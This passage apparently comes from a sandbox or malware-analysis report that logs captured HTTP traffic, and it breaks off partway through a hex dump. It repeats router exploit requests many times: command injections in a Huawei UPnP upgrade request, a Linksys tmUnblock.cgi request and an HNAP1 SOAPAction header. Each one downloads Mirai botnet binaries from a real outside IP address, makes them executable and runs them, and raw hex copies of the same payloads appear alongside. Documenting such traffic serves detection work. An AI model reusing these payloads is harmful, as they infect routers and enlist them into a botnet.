3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 